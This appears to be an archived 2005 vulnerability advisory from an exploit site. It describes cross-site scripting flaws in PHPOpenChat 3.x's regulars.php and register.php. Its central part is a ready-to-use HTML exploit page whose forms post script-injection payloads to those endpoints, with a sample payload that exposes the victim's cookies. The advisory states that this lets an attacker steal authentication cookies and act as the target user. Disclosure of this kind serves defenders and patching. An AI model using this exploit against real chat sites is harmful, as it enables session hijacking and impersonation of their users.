phpOpenChat.txt

phpOpenChat.txt: Posted Mar 22, 2005; Authored by Pi3cH; PHPOpenChat version 3.x is susceptible to multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | eb640f8cd71386f8b9bcd2ff6d49201c80d343e38dfeb94f3d88ebb58c229c92; Download | Favorite | View

phpOpenChat.txt



[PersianHacker.NET 200503-09]PHPOpenChat v3.X XSS Multiple Vulnerability
Date: 2005 March
Bug Number: 09

PHPOpenChat
is a high performance php-based chat server software for a live chat-room or -module on every php-based site.
More info @:
http://phpopenchat.org/


Discussion:
--------------------
The software does not properly validate user-supplied input in 'regulars.php', 'register.php'.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHPOpenChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


Exploit:
--------------------
<html>
<head>
<title>PHPOpenChat v3.x XSS Exploit</title>
</head>
<body>
<h1>PHPOpenChat v3.x XSS Exploit</h1>
<form method="POST" action="http://www.example.com/regulars.php">
  <b>XSS in regulars.php:</b><p>
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  </p>
  <p>exmple: <script>document.write(document.cookie)</script></p>
  <p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<form method="POST" action="http://www.example.com/register.php">
  <b>XSS in register.php:</b><p>
  Nikname:
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  <p>
  Password:
  <input type="text" name="chatter1" size="48" value="XSS Injection Code"></p>
  <p>
  FirstName LastName:
  <input type="text" name="chatter2" size="48" value="XSS Injection Code"></p>
  <p>
  Email:
  <input type="text" name="chatter3" size="48" value="XSS Injection Code"></p>
  <p>
  Url of picture:
  <input type="text" name="chatter4" size="48" value="XSS Injection Code"></p>
  </p>
  <p>exmple: <script>document.write(document.cookie)</script></p>
  <p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>


Solution:
--------------------
No solution was available at the time of this entry.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: devil_box(for xss article), amectris, herbod.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
This vulnerability reported to authors for solution, from bug report webform.

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

phpOpenChat.txt

phpOpenChat.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpOpenChat.txt

Share This

phpOpenChat.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems